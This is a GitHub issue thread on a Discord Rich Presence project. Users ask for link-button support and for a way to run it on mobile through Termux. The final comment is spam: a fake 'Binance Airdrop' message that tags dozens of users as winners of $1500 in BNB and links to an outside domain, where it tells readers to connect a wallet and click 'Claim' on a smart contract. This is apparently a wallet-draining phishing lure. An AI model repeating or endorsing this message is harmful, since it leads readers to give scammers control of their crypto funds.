### ISSUE TITLE
FETURE REQUEST

### ISSUE THREAD

**Issue by omsenjalia** [niveshbirangal/discord-rpc#16]
Add button support

**Comment by omsenjalia** [comment]
Link buttons btw

**Comment by niveshbirangal** [comment]
Hey, you can check this one for buttons https://www.youtube.com/watch?v=-WBQuAlF_DE&ab_channel=xZyn

**Comment by squonline** [comment]
I add same code as in video but it say "`label" is not defined`. any fix? (I'm new)

**Comment by niveshbirangal** [comment]
In that video description, it contains a link to the code. You can download that one and try.

**Comment by DevAmiyo** [comment]
Add button support to this project

**Comment by DevAmiyo** [comment]
> In that video description, it contains a link to the code. You can download that one and try.

It lacks a lot of features this has like small image and text and state

**Comment by niveshbirangal** [comment]
@DevAmiyo Sure. I will try.

**Comment by omxpro** [comment]
Wow this still exists

**Comment by omxpro** [comment]
Is there a way to run rpc on mob?

**Comment by niveshbirangal** [comment]
In theory. Yes!

**Comment by omxpro** [comment]
> In theory. Yes!

How???

**Comment by omsenjalia** [comment]
Is this possible on mobile?

**Comment by omsenjalia** [comment]
Using termux

**Comment by f1bdis** [comment]
@TerraPlayz It worked for me using termux

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Viking93681, @baikho, @DavAlbert, @JSanestrzik, @Galenki, @srilovesflutter, @h3ndry, @afedericojr, @Wooza, @Chaudhrycool, @Blessing0113, @Berikai, @DrewWilson04, @martin226, @robinalexandre, @cagegit, @rbj325, @FrankQixiangGao, @llsc12, @gogoyqj, @jaydenkim, @JeffResc, @nhlfr, @michaeldadzie, @EghaRodhu, @Retromarcus, @JackTeo995, @josephguan, @JellyBrick, @jiyeonseo, @BruceHunter, @jiteshpubreja, @richardtoth94, @vishalvibes, @straves16, @david90, @changemin, @rajephon, @Adjamo, @dfuerle, @thushan, @NotIshanSingh, @Danyson, @h2non, @AdrianoCahete, @NashifAlam, @tomshen, @data-dude, @kouxichao, @Saint111188
